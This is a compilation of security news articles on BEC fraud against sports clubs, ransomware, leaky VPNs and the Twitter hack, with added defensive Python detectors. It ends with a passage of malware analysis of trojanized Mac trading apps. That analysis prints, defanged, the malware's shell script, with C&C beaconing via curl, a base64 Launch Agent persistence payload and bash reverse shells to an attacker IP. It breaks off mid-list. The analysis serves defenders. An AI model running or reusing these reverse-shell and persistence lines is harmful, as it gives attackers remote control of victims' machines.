Premier League team narrowly avoids losing £1 million to scammers

In another incident, ransomware attackers almost forced the cancellation of a match, a report reveals

Sports organizations from around the United Kingdom have been urged to tighten their cybersecurity after a report revealed a string of attacks against various sports clubs, including an attempt to disrupt a lucrative Premier League transfer deal.

In its first Cyber Threat to Sports Organizations report, the UK’s National Cyber Security Centre (NCSC) singled out Business Email Compromise (BEC) fraud as the biggest threat to sports organizations, with financial gain being the key motivation for BEC attackers. No wonder the sports industry is a lucrative target, contributing £37 billion (US$47 billion) to the UK’s economy each year.

As an example, the NCSC highlighted an incident in which the email account belonging to the managing director of a Premier League club was compromised during a transfer negotiation worth £1 million (US$1.3 million). The attackers used a spear phishing attack involving a malicious email that took the director to a spoofed Office 365 login page where he unwittingly turned over his credentials.

“The attackers assumed the identity of the MD and communicated with the European club. Simultaneously they created a false email account and pretended to be the European club in communications with the real MD,” said the report. Fortunately, a bank involved in the transfer stepped in at the eleventh hour and thwarted the scheme. In a way, the incident brings echoes of a similar scam where Italian Serie A team Lazio was reportedly duped out of £1.75 million (US$2.2 million).
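The attack described above relied on a false email account that resembled the real counterparty. One defensive control a club's mail gateway or SOC can apply is a look-alike check of the From and Reply-To domains against a list of known partner domains. The following is an added example, not code from the NCSC report or the clubs involved; the trusted-domain list and the sample messages are constructed for illustration, and the edit-distance threshold is an assumed tuning value.

```python
"""Flag look-alike sender domains in the kind of BEC attempt described above.

Added example (not from the NCSC report). It assumes an organisation keeps a
list of trusted counterparty domains (constructed here) and checks each
inbound message's From and Reply-To domains against it: an exact match is
fine, a near-miss (small edit distance, e.g. one swapped letter) is flagged
as impersonation, and a Reply-To pointing at a different domain than From is
flagged too, because replies would then be routed to the attacker.
"""
from email.utils import parseaddr
from typing import Dict, List, Optional, Tuple

# Constructed list of domains this organisation legitimately corresponds with.
TRUSTED_DOMAINS = ["europeanclub-fc.example", "premierclub.example", "bank.example"]


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance between two strings (insert/delete/substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value: str) -> str:
    """Extract the lower-cased domain from a header like 'Name <user@host>'."""
    _, addr = parseaddr(header_value)
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def closest_trusted(domain: str, trusted: List[str]) -> Optional[Tuple[str, int]]:
    """Return (trusted_domain, distance) for the nearest trusted domain, or None."""
    if not domain:
        return None
    best = min(trusted, key=lambda t: edit_distance(domain, t))
    return best, edit_distance(domain, best)


def assess_message(headers: Dict[str, str], trusted: List[str] = TRUSTED_DOMAINS,
                   max_distance: int = 2) -> List[str]:
    """Return BEC warnings for one message's headers (empty list = no concern)."""
    warnings: List[str] = []
    from_domain = domain_of(headers.get("From", ""))
    # A missing Reply-To means replies go back to the From address.
    reply_domain = domain_of(headers.get("Reply-To", "")) or from_domain
    match = closest_trusted(from_domain, trusted)
    if match and 0 < match[1] <= max_distance:
        warnings.append(f"From domain {from_domain!r} looks like trusted "
                        f"{match[0]!r} (edit distance {match[1]})")
    if reply_domain != from_domain:
        warnings.append(f"Reply-To domain {reply_domain!r} differs from "
                        f"From domain {from_domain!r}")
    return warnings


# Constructed messages: a genuine one, a look-alike domain (l -> 1), and a Reply-To hijack.
SAMPLE_MESSAGES = [
    {"From": "Transfers <office@europeanclub-fc.example>"},
    {"From": "Transfers <office@europeanc1ub-fc.example>"},
    {"From": "MD <md@premierclub.example>", "Reply-To": "md.premierclub@webmail.example"},
]

if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(msg["From"], "->", assess_message(msg) or "OK")
```

The distance check will also fire on legitimately similar domains (two partners whose names differ by a character), so treat a hit as a prompt for out-of-band confirmation of the payment instructions rather than as proof of fraud; that confirmation step is the control that saved the club in the case above.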

The NCSC also singled out a ransomware attack that encrypted all end-user devices and several servers belonging to an English Football League club. The attack also cut off its security cameras and turnstiles, which almost led to a match cancellation. The team refused to pay a hefty 400 bitcoin ransom (some US$4 million today) and eventually recovered, but not before incurring losses totaling several hundred thousand pounds.

RELATED READING: Ransomware: Expert advice on how to keep safe and secure

Once it audited its systems, the team found that it lacked sufficient security controls, didn’t invest enough in cybersecurity infrastructure, and didn’t have an emergency response plan in place. Regularly patching and updating systems as well as having backups are just some of the recommendations organizations should implement; for more advice on defending against ransomware, be sure to check out this white paper.

In another incident, a member of staff at a UK racecourse wanted to purchase a piece of groundskeeping equipment on eBay, ultimately agreeing with a seller to pay £15,000 (some US$19,000) for one such listed item. “At this point the seller sent the member of staff bank transfer details via an eBay message, this diverted the member of staff to a spoofed version of eBay,” reads the report. The buyer made the payment and while they later realized their mistake the money couldn’t be recovered.

RELATED READING: Common eBay scams and how to avoid them

The big picture

The NCSC report also revealed that at least 70% of the surveyed sports organizations experienced some form of cyber-incident or breach every year, with 3 in 10 incidents ending up causing direct financial damage to the targeted clubs. The average cost of such an incident was more than £10,000 (some US$12,700) while the biggest single loss incurred was worth an astounding £4 million (approx. US$5.1 million).

“While cybersecurity might not be an obvious consideration for the sports sector as it thinks about its return, our findings show the impact of cyber criminals cashing in on this industry is very real,” said Paul Chichester, Director of Operations at the NCSC. He also went on to urge sports organizations to improve their cybersecurity in order to protect themselves – as well as millions of fans. For example, to mitigate the risk of successful BEC attempts, organizations would be well advised to implement some form of multi-factor authentication.

Meanwhile, Sir Hugh Robertson, the Chair of the British Olympic association, acknowledged the importance of the report, saying, “The British Olympic Association sees this report as a crucial first step, helping sports organizations to better understand the threat and highlighting practical steps that organizations should take to improve cybersecurity practices.”

Google adds security enhancements to Gmail, Meet and Chat

The tech giant introduces its own version of verified accounts in Gmail, rolls out increased moderation controls in Meet, and enhances phishing protection in Chat

Google has announced a host of new features for its G Suite family of applications that are aimed at bolstering the security of Gmail, Meet and Chat users. The company is also introducing new ways for IT administrators to manage and secure devices using the Admin Console.

The search engine giant is piloting a new feature that will display the logo of an organization or brand in the avatar slot of the Gmail user interface. That should give people more confidence that the email message is from a legitimate sender and ultimately thwart phishing attacks that spoof genuine companies.

The new functionality uses the Brand Indicators for Message Identification (BIMI) standard and allows organizations that use the DMARC technology to validate the ownership of their logos and securely transmit them to Google. The BIMI standard is being developed by the AuthIndicators Working Group, which Google joined a year ago.

“BIMI provides benefits to the whole email ecosystem. By requiring strong authentication, users and email security systems can have increased confidence in the source of emails, and senders will be able to leverage their brand trust and provide their customers with a more immersive experience,” said Google.

Source: Google Cloud blog
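BIMI only lets a receiver show a sender's logo when the sending domain already enforces DMARC, so before publishing a logo a mail administrator needs to confirm that both DNS records are in order. The following is an added example, not code from Google or the AuthIndicators Working Group: it parses DMARC (at _dmarc.<domain>) and BIMI (at <selector>._bimi.<domain>) TXT records and reports why a domain would not qualify. The eligibility rules encoded (p=quarantine or p=reject, pct of 100, no sp=none, an HTTPS logo URL in the BIMI l= tag) follow the BIMI draft specification; the sample records are constructed and no DNS lookups are performed.

```python
"""BIMI readiness check over DMARC and BIMI DNS TXT records.

Added example (not Google's or the AuthIndicators group's code). The sample
records below are constructed for the example; in practice you would fetch
the TXT records for _dmarc.<domain> and <selector>._bimi.<domain> from DNS.
"""
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed TXT records keyed by the DNS name at which they would be published.
SAMPLE_RECORDS: Dict[str, str] = {
    "_dmarc.enforcing.example": "v=DMARC1; p=reject; rua=mailto:dmarc@enforcing.example",
    "default._bimi.enforcing.example": ("v=BIMI1; l=https://enforcing.example/brand/logo.svg; "
                                        "a=https://enforcing.example/brand/vmc.pem"),
    "_dmarc.monitoring.example": "v=DMARC1; p=none; rua=mailto:dmarc@monitoring.example",
    "default._bimi.monitoring.example": "v=BIMI1; l=https://monitoring.example/logo.svg;",
    "_dmarc.partial.example": "v=DMARC1; p=quarantine; pct=50",
    "default._bimi.partial.example": "v=BIMI1; l=https://partial.example/logo.svg",
}


def parse_tags(record: str) -> Dict[str, str]:
    """Split a 'k=v; k=v' DNS policy record into a tag dictionary."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


@dataclass
class BimiReport:
    domain: str
    eligible: bool
    reasons: List[str] = field(default_factory=list)


def check_bimi_readiness(domain: str, records: Dict[str, str],
                         selector: str = "default") -> BimiReport:
    """Evaluate whether a domain's DMARC policy is strong enough for BIMI.

    BIMI requires an enforcing DMARC policy: p=quarantine or p=reject, applied
    to all mail (pct=100), with the subdomain policy (sp), if set, not 'none'.
    The BIMI record itself must carry an HTTPS logo location (l=); the a=
    evidence tag is optional.
    """
    reasons: List[str] = []
    dmarc = parse_tags(records.get(f"_dmarc.{domain}", ""))
    bimi = parse_tags(records.get(f"{selector}._bimi.{domain}", ""))

    if dmarc.get("v") != "DMARC1":
        reasons.append("no DMARC record published")
    else:
        policy = dmarc.get("p", "none").lower()
        if policy not in ("quarantine", "reject"):
            reasons.append(f"DMARC policy p={policy} is not enforcing")
        if dmarc.get("pct", "100") != "100":
            reasons.append(f"DMARC pct={dmarc['pct']} leaves some mail unenforced")
        if "sp" in dmarc and dmarc["sp"].lower() == "none":
            reasons.append("DMARC subdomain policy sp=none is not enforcing")

    if bimi.get("v") != "BIMI1":
        reasons.append("no BIMI record published")
    elif not bimi.get("l"):
        reasons.append("BIMI record has no logo location (l=)")
    elif not bimi["l"].lower().startswith("https://"):
        reasons.append("BIMI logo must be served over HTTPS")

    return BimiReport(domain=domain, eligible=not reasons, reasons=reasons)


if __name__ == "__main__":
    for d in ("enforcing.example", "monitoring.example", "partial.example"):
        r = check_bimi_readiness(d, SAMPLE_RECORDS)
        print(d, "eligible" if r.eligible else "not eligible", r.reasons)
```

The check is deliberately conservative: a domain still in DMARC monitoring mode (p=none) or rolling out enforcement gradually (pct below 100) gets no logo, which is the point of the standard, since the logo is only meaningful if spoofed mail from that domain is actually being quarantined or rejected.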

The videoconferencing platform Google Meet also received a security boost in the form of new controls that allow the host to manage who can join meetings and how. Uninvited guests who have been ejected out of a meeting won’t be able to re-join unless the host re-invites them. Meanwhile, attendees who’ve had their knocking requests denied multiple times will be automatically banned from sending more requests.

Additionally, hosts are also receiving advanced safety lock capabilities that let them decide on the method through which people can join meetings and what level of participation they are allowed once they join. While safety locks are engaged, anonymous users, i.e. those not logged into their Google accounts, will be blocked from joining the meeting.

Google has also bolstered phishing protection in Google Chat. Previously launched on Gmail, the new safeguard checks links sent in Chat against real-time data from Safe Browsing and warns users if it finds anything suspicious. Blocking and reporting Chat Rooms if anything malicious is afoot is another feature that is being rolled out to users over the coming weeks. Google also added a filter that automatically detects and limits abusive content, such as spammy invites across G Suite.

RELATED READING: Would you get hooked by a phishing scam? Test yourself

IT admins will get a slew of new and enhanced tools to manage G Suite, including a redesigned devices page for better device management as well as Apple Business Manager integration allowing them to easily manage their organization’s iOS devices. Google has also introduced some new tools to its Data Loss Prevention feature.

The updates are being released to respond to the needs of people working remotely after COVID-19 has forced a lot of companies to shift to teleworking. If working from home is starting to feel demoralizing, ESET Chief Security Evangelist Tony Anscombe has some advice on how to overcome the associated challenges.

Privacy watchdogs urge videoconferencing services to boost privacy protections

The open letter highlights five security and privacy principles that require heightened attention from videoconferencing services

Six data protection and privacy authorities from countries in four continents have addressed an open letter to video teleconferencing (VTC) companies, asking them to re-evaluate how they safeguard the privacy rights and data of citizens around the globe.

With people tethered to their homes during the pandemic, videoconferencing services have seen a surge in use; including for staying in touch with friends and family and for hosting work meetings, online classes and virtual doctor appointments. However, the spike in demand has also been accompanied by reports of security issues faced by some of the platforms, as well as by concerns directly being raised with the regulatory bodies themselves.

“The purpose of this open letter is to set out our concerns, and to clarify our expectations and the steps you should be taking as VTC companies to mitigate the identified risks and ultimately ensure that our citizens’ personal information is safeguarded in line with public expectations and protected from any harm,” according to the letter, signed by privacy commissioners and regulators from Australia, Canada, Gibraltar, Hong Kong, Switzerland, and the United Kingdom.

The letter highlights five principles VTC companies should focus their attention on – security, privacy-by-design, knowing their audience, transparency and fairness, and end-user control. It is intended for all companies providing videoconferencing services; however, Microsoft, Cisco, Zoom, House Party and Google have been sent the letter directly.

The regulators expect companies to secure user data by implementing certain security safeguards as standard, such as end-to-end encryption for all communication and two-factor authentication for logins, as well as by requiring users to create strong passwords. Prompting people to regularly update to the newest version of their communication client is also expected of the VTC platforms.

“Particular attention should also be paid to ensuring that information is adequately protected when processed by third-parties, including in other countries,” reads the letter. Its signatories also acknowledge that the pandemic has led to VTC platforms being used in ways that are different from those they were designed for, which may open doors to unanticipated threats. They encourage the companies to review these new use-cases and implement necessary data protection and privacy measures accordingly.

“This is particularly important when it comes to children, vulnerable groups, and contexts where discussions on calls are likely to be especially sensitive (in education and healthcare for example), or when operating in jurisdictions where human rights and civil liberty issues might create additional risk to individuals engaging with the platform,” said the commissioners.

Where transparency and fairness are concerned, companies are asked to be up-front about what data they collect and how they handle it. The letter goes on to warn that failing to do so may lead to law violations and breaches of user trust. The privacy regulators expect to receive answers from the companies by September 30th, 2020.

Argentine telecom company hit by major ransomware attack

Telecom Argentina says it has contained the attack and regained access to its systems without paying up

Telecom Argentina, one of the country’s largest Internet Service Providers (ISPs), has suffered a major ransomware attack, according to a local report. The cybercriminals behind the attack demanded US$7.5 million in Monero cryptocurrency to unlock the encrypted files, but the company claims that it has restored access to its systems and that it hasn’t caved in to the extortionists’ demands.

The attack, which took place over the weekend, apparently didn’t have a sizeable impact on services provided by the company – the internet connection didn’t go down, nor were the landlines or any of its other services disrupted. However, there was some impact on systems that provide remote customer service.

The payload was delivered in an email attachment that was downloaded and opened by one of the employees. Ultimately, the attackers hijacked an internal Domain Admin and used it to spread the infestation to over 18,000 workstations. Having spotted the infiltration, the company sent out an internal communication to its customer service employees about the incident.

RELATED READING: Ransomware: To pay or not to pay?

The notice, which was later also shared by employees on various social media platforms, urged staff to minimize access, including through VPN, to the corporate network. The employees were also told not to open emails from unknown addresses and to turn off any compromised computers immediately.

According to ZDNet, the company was hit by Sodinokibi aka REvil ransomware, a threat also described in ESET’s recent Threat Report. Besides demanding a payment for unlocking access to the files, the operators of the Sodinokibi ransomware are known to ramp up pressure on victims by threatening to dump their sensitive information online.

In recent years, the ransomware scourge has affected organizations of all sizes, including small businesses, healthcare providers and city governments. In 2018, the US city of Atlanta was struck by an especially costly ransomware attack.

An executive audience could benefit from perusing ESET’s white paper on how enterprises can mitigate the risks of ransomware attacks. In recent years, the Remote Desktop Protocol (RDP) has become an increasingly popular attack vector for ransomware-wielding gangs, who typically brute-force their way into a poorly secured network, elevate their rights to admin level, disable or uninstall security solutions and then run ransomware to encrypt crucial company data.
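The RDP intrusion chain just described starts with password guessing against an exposed endpoint, and that first step is visible in the Windows Security log as a burst of failed logons (event 4625, logon type 10 for RemoteInteractive) from one source address, often followed by a success (event 4624). The following is an added example, not code from ESET or the white paper; it runs over constructed, simplified log records rather than real event XML, and the threshold and window are assumed tuning values.

```python
"""Spot RDP password-guessing in Windows logon events.

Added example, not from ESET or the report. It works over constructed,
simplified Security-log records: event 4625 = failed logon, 4624 = successful
logon, logon type 10 = RemoteInteractive (RDP). It flags a source address that
produces a burst of failures inside a short window, and separately a success
from that same address while the burst is still hot, which is the pattern
that precedes the privilege escalation and ransomware steps described above.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Deque, Dict, List


@dataclass(frozen=True)
class LogonEvent:
    when: datetime
    event_id: int       # 4625 failure, 4624 success
    logon_type: int     # 10 = RemoteInteractive (RDP)
    user: str
    source_ip: str


def parse_events(lines: List[str]) -> List[LogonEvent]:
    """Parse 'timestamp|event_id|logon_type|user|source_ip' lines (constructed format)."""
    events = []
    for line in lines:
        ts, eid, ltype, user, ip = [f.strip() for f in line.split("|")]
        events.append(LogonEvent(datetime.fromisoformat(ts), int(eid), int(ltype), user, ip))
    return sorted(events, key=lambda e: e.when)


def detect_rdp_bruteforce(events: List[LogonEvent], threshold: int = 5,
                          window: timedelta = timedelta(minutes=2)) -> Dict[str, List[str]]:
    """Return {source_ip: [alerts]} for RDP logon activity.

    A sliding window of failure timestamps is kept per source IP. When the
    window holds >= threshold failures an alert is raised once per burst; a
    success from an IP whose window is still hot raises a second, more urgent
    alert, because the guessing may have found a valid password.
    """
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    alerted: Dict[str, bool] = defaultdict(bool)
    alerts: Dict[str, List[str]] = defaultdict(list)
    for e in events:
        if e.logon_type != 10:          # only RDP sessions are of interest here
            continue
        q = failures[e.source_ip]
        while q and e.when - q[0] > window:   # drop failures older than the window
            q.popleft()
        if len(q) < threshold:
            alerted[e.source_ip] = False      # burst has cooled; allow a new alert
        if e.event_id == 4625:
            q.append(e.when)
            if len(q) >= threshold and not alerted[e.source_ip]:
                alerts[e.source_ip].append(
                    f"{len(q)} RDP failures within {window} ending {e.when:%H:%M:%S}")
                alerted[e.source_ip] = True
        elif e.event_id == 4624:
            if len(q) >= threshold:
                alerts[e.source_ip].append(
                    f"RDP success for {e.user!r} after {len(q)} failures at {e.when:%H:%M:%S}")
            q.clear()
    return dict(alerts)


# Constructed records: a guessing burst that ends in a success, a legitimate
# user's single typo, and a non-RDP network logon that must be ignored.
SAMPLE_LOG = [
    "2020-07-18T02:00:05|4625|10|administrator|203.0.113.7",
    "2020-07-18T02:00:09|4625|10|admin|203.0.113.7",
    "2020-07-18T02:00:14|4625|10|backup|203.0.113.7",
    "2020-07-18T02:00:20|4625|10|sqlsvc|203.0.113.7",
    "2020-07-18T02:00:26|4625|10|helpdesk|203.0.113.7",
    "2020-07-18T02:00:33|4625|10|jsmith|203.0.113.7",
    "2020-07-18T02:00:41|4624|10|jsmith|203.0.113.7",
    "2020-07-18T08:15:00|4625|10|mperez|198.51.100.20",
    "2020-07-18T08:15:12|4624|10|mperez|198.51.100.20",
    "2020-07-18T09:00:00|4625|3|svc-scan|10.0.0.5",
]

if __name__ == "__main__":
    for ip, found in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)).items():
        for line in found:
            print(ip, line)
```

The "success after a burst" alert is the one to page on: a lone burst may be noise from an internet-facing host, but a logon that follows it from the same address is the moment at which the privilege escalation and security-software tampering described above can begin. The stronger fix remains not exposing RDP to the internet at all.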

7 VPN services leaked data of over 20 million users, says report

A report calls into question the providers’ security practices and dismisses their claims of being no-log VPN services

Seven Virtual Private Network (VPN) providers who claim not to keep any logs of their users’ online activities recently left 1.2 terabytes of private user data exposed to anyone who comes looking. The data, found on a server shared by the services, included the Personally Identifiable Information (PII) of potentially as many as 20 million VPN users, said researchers at vpnMentor, who uncovered the leak.

Besides the personal details, which included the users’ email and home addresses, clear text passwords, and IP addresses, the server was also found to store several instances of internet activity logs, which casts doubt on the providers’ claims about strict no-logs policies.

UFO VPN, FAST VPN, FREE VPN, SUPER VPN, Flash VPN, Secure VPN, and Rabbit VPN are all implicated in the incident. The report suggests that all these Hong Kong-based services have a shared developer and app and are assumed to be white-label solutions that are repurposed under different brands for other companies. This assumption is based on the services sharing the same Elasticsearch server, being hosted on the same assets, and on the fact that the services share a single recipient for payments.

The researchers ran a series of tests using one of the VPN services, UFO VPN. After downloading and using the mobile app to connect to servers around the globe, their activities were recorded in the database, comprising their personal details that included an email address, IP address, device, and the server they connected to. Beyond confirming their suspicions, they also found that the database logged the username and password used to create the account.

The database even contained technical data about the devices on which the VPNs were installed, such as the origins’ IP addresses, Internet Service Provider, actual location, device model, type and ID, as well the user’s network connection. “The VPN server users connected to was also exposed, including its region and IP address. This makes the affected VPN service virtually useless, as the user’s origin IP address can be connected to their activity on the target server,” explained vpnMentor.

In a nutshell, all the details that were logged and exposed by these self-proclaimed “no-log” VPN services could spell problems in different orders of magnitude to their users. VPNs are used for several main reasons, including to add an extra layer of security and privacy, access content that may not be strictly legal in specific countries (some outlaw pornography), bypass geo-restrictions, or by political activists.

Depending on who is targeted by a malicious actor, the VPN users could end up getting targeted by phishing campaigns, become victims of fraud, or face blackmail, arrests and persecution.

Adhering to responsible disclosure guidelines, the researchers disclosed the security lapse to the VPN providers on July 5th and contacted the Hong Kong Computer Emergency Response Team on July 8th. The server was closed on July 15th.

The users of one of the seven VPN providers would be well advised to consider switching to another service and change their login information on any other online accounts. This report should in no way discourage you from using a VPN, but may instead be a reminder to choose your VPN provider carefully.

Data breach reports down by one‑third in first half of 2020

The Identity Theft Resource Center doesn’t expect the trend to last, however

While cybercriminals have been busy targeting people with various flavors of COVID-19-related scams, the number of publicly reported data breaches in the United States in the first half of 2020 dropped by 33% year-on-year.

This is according to a report published by the Identity Theft Resource Center (ITRC), which also revealed that the number of people affected by data breaches between January and June of this year plummeted 66% on a yearly basis, bringing the number of impacted individuals to some 164 million.

Attacks by external threat actors are still considered to be the most common cause of data breaches, being responsible for 404 out of a total of 540 incidents reported in the first half of this year.

However, data compromises caused by insiders are at a three-year low, with 83 such incidents reported from January to June. The center attributes this in part to the pandemic, reasoning that more people are currently working from home and have less access to corporate systems and data.

ITRC president and CEO Eva Velasquez considers the decrease in the volume of data breaches and the number of impacted individuals good news for both consumers and businesses.

“However, the emotional and financial impacts on individuals and organizations are still significant. The impact on individuals may be even more harmful as criminals use stolen personal information to misappropriate government benefits intended to ease the impact of the COVID-19 pandemic,” she added. The Federal Trade Commission as well as the Internal Revenue Service have been warning about scammers targeting individuals eligible to receive stimulus payments.

RELATED READING: Simple steps to protect yourself against identity theft

Instead of harvesting new data, ITRC says, cybercriminals are currently utilizing data from breaches dating all the way back to 2015 to fuel their COVID-19 related scams, as well as to conduct other traditional fraud activities, such as phishing campaigns and credential-stuffing attacks.

The ITRC suggests that if the trend continues and there are no sudden surges in the number of breaches, 2020 is on track to be the year with the lowest number of breaches and data exposures since 2015. But the center is skeptical that the lull will last. Once the criminals’ credential well starts running dry, Velasquez expects things to go back to ‘normal’.

“Cybercriminals will have to act to update their data at some point, which will lead to a return to more normal threat patterns. While it is too early to tell when that may occur, it likely won’t happen overnight, but breaches will gradually increase over time.”

There are multiple easy steps you can take to mitigate the risks of becoming a victim of an incident that exploits data stolen in a security breach. For starters, stop recycling your passwords and instead use a unique and strong password or passphrase for each of your online accounts. Admittedly, this is by no means an easy feat, which is why a password manager can come in handy. Another thing you can do is employ two-factor authentication to add an extra layer of security to your accounts. And finally, try to adhere to best cybersecurity practices, including by brushing up on some of the basics outlined in this article.

Week in security with Tony Anscombe

Trojanized cryptocurrency trading apps targeting Mac users – An Android chat app turns out to be spyware – Twitter sustains a massive hack

ESET researchers uncover a malicious campaign that rebrands legitimate cryptocurrency trading applications for Mac to deliver GMERA malware and steal cryptocurrency and data from victims. Also this week, ESET experts released their findings about a malicious operation that spies on Android users via Welcome Chat, an app posing as a secure chat service. Twitter has sustained an unprecedented security incident where the accounts of a long list of prominent figures were hacked to promote a Bitcoin scam. All this – and more – on WeLiveSecurity.com.

High‑profile Twitter accounts hacked to promote Bitcoin scam

Tech titans and prominent politicians among victims of a sprawling hack that Twitter says leveraged its internal tools

Twitter is reeling from what is arguably the biggest security breach in its history after the accounts of a long list of high-profile figures – including Barack Obama, Joe Biden, Elon Musk, Bill Gates and Jeff Bezos – were hijacked and used to promote a Bitcoin scam.

The spate of attacks started late on Wednesday, with one of the first suspicious tweets then fired off from the account of the Tesla and SpaceX CEO. The now-deleted tweet followed a familiar pattern, bringing echoes of cryptocurrency scams that used Musk’s name and promised to return double the amount of bitcoin sent:

“I’m feeling generous because of Covid-19. I’ll double any BTC payment sent to my BTC address for the next hour. Good luck, and stay safe out there!” read the message that appeared on Musk’s account.

RELATED READING: What to do if your Twitter account has been hacked

A flurry of similar tweets were also sent out from the other hijacked handles; apparently, some people fell for the ploy, since one of the cryptocurrency addresses has, as of the time of writing, received 12.86 BTC (some US$117,000).

We are aware of a security incident impacting accounts on Twitter. We are investigating and taking steps to fix it. We will update everyone shortly.

— Twitter Support (@TwitterSupport) July 15, 2020

The social media giant took a number of steps to swiftly remedy the situation. This included temporarily locking all compromised accounts, with Twitter stating that it would restore access only when it could do so securely. In short order, the company went on to take the unprecedented step of temporarily locking down all verified accounts, i.e. accounts marked by a blue tick.

We also limited functionality for a much larger group of accounts, like all verified accounts (even those with no evidence of being compromised), while we continue to fully investigate this.

— Twitter Support (@TwitterSupport) July 16, 2020

All the while, Twitter sought to keep everyone apprised by maintaining a steady stream of tweets informing about the developing situation. Eventually, the company started restoring functionality to the accounts, allowing them to tweet again.

So, how did it all happen?

Obviously the key question that screams for an answer is: “How was the massive hack executed?” According to the microblogging site, the incidents were caused by a social engineering attack on its employees:

We detected what we believe to be a coordinated social engineering attack by people who successfully targeted some of our employees with access to internal systems and tools.

— Twitter Support (@TwitterSupport) July 16, 2020

Meanwhile, a Motherboard article seems to suggest that there may be more to the story, as several confidential sources from the black-hat community told the site that they had actually paid a Twitter insider to do the job.

In response, a Twitter spokesperson told Motherboard that the company was looking into whether the employee had possibly hijacked the account themselves or provided the cybercriminals with access to the tool.

RELATED READING: Insider threats: A persistent and widespread problem

ESET Security Specialist Jake Moore put the issue into a broader context: “Acting like a help desk, these employee accounts were enabled to use a specific admin tool and do whatever they wanted, which is likely to be a problem for many businesses. Some organizations lend an incredible amount of trust to certain employees. However, although they may be trusted not to compromise an account themselves, it must be taken into consideration that the employees will be targeted by criminal hackers.”

He also had some advice to share urging Twitter users to watch out for online scams: “When a message seems too good to be true it probably is, regardless of who has posted it. Bitcoin doubling schemes are synonymous with the criminal fraternity and must be avoided and reported where possible.”

Mac cryptocurrency trading application rebranded, bundled with malware

ESET researchers lure GMERA malware operators to remotely control their Mac honeypots

We’ve recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is used to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware samples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA, in an analysis they published in September 2019. As in the previous campaigns, the malware reports to a C&C server over HTTP and connects remote terminal sessions to another C&C server using a hardcoded IP address. This time, however, not only did the malware authors wrap the original, legitimate application to include malware; they also rebranded the Kattana trading application with new names and copied its original website. We have seen the following fictitious brandings used in different campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to the analysis of the malware code, ESET researchers have also set up honeypots to try to reveal the motivations behind this group of criminals.

Distribution

We have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020, Kattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized app. We couldn’t confirm that it was linked to this particular campaign, but it could very well be the case.

Figure 1. Kattana warns about trojanized copies of their software on Twitter

Copycat websites are set up to make the bogus application download look legitimate. For a person who doesn’t know Kattana, the websites do look legitimate.

Figure 2. Original (legitimate) Kattana website

Figure 3. Malicious Licatrade website with download link to malware

The download button on the bogus sites is a link to a ZIP archive containing the trojanized application bundle.

Analysis

Malware analysis in this case is pretty straightforward. We will take the Licatrade sample as the example here. Other samples have minor differences, but the ideas and functionalities are essentially the same. Similar analyses of earlier GMERA campaigns are provided in Trend Micro’s blogpost and in Objective-See’s Mac malware of 2019 report.

Figure 4. Content of the Licatrade application bundle

Modification timestamps of the files in the ZIP archive, the date the application was signed, and the Last‑Modified HTTP header when we downloaded the archive all show April 15th, 2020. This is highly suggestive that this campaign started on that date.

A shell script (run.sh) is included in the resources of the application bundle. The main executable, written in Swift, launches run.sh. For some reason, the malware author has duplicated functionality to send a simple report to a C&C server over HTTP, and to connect to a remote host via TCP providing a remote shell to the attackers, in both the main executable and the shell script. An additional functionality, in the shell script only, is to set up persistence by installing a Launch Agent.

Here is the full shell script source (ellipsis in long string and defanged):

#! /bin/bash
function remove_spec_char(){
echo "$1" | tr -dc '[:alnum:].r' | tr '[:upper:]' '[:lower:]'
}
whoami="$(remove_spec_char `whoami`)"
ip="$(remove_spec_char `curl -s ipecho.net/plain`)"
req=`curl -ks "http://stepbystepby[.]com/link.php?${whoami}&${ip}"`
plist_text="ZWNobyAnc2R2a21…d2Vpdm5laXZuZSc="
echo "$plist_text" | base64 --decode > "/tmp/.com.apple.system.plist"
cp "/tmp/.com.apple.system.plist" "$HOME/Library/LaunchAgents/.com.apple.system.plist"
launchctl load "/tmp/.com.apple.system.plist"
scre=`screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'`

It’s interesting to note that persistence is broken in the Licatrade sample: the content of the resulting Launch Agent file (.com.apple.system.plist) isn’t in Property List format as launchd expects, but instead is the command line to be executed.

The decoded content (ellipses in long strings) of the $plist_text variable is:

echo 'sdvkmsdfmsd…kxweivneivne'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'; done; echo 'sdvkmsdfmsdfms…nicvmdskxweivneivne'

If run directly, this code would open a reverse shell from the victim machine to an attacker-controlled server, but that fails here. Fortunately for the attackers, the last line of the shell script also starts a reverse shell to their server.

The Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed and successfully starts when the user logs in.

The various reverse shells used by these malware operators connect to different remote ports depending on how they were started. All connections are unencrypted. Here is a list of ports, based on the Licatrade sample.

TCP Port | Where                      | How
---------|----------------------------|-------------------------------
25733    | Licatrade executable       | zsh in screen using ztcp
25733    | run.sh                     | bash in screen using /dev/tcp
25733    | Launch Agent (Not working) | bash in screen using /dev/tcp
25734    | Licatrade executable       | zsh using ztcp
25735    | Licatrade executable       | bash using /dev/tcp
25736    | Licatrade executable       | bash in screen using /dev/tcp
25737    | Licatrade executable       | bash in screen using /dev/tcp
25738    | Licatrade executable       | zsh in screen using ztcp

Here are some example command lines used:

Bash in screen using /dev/tcp:

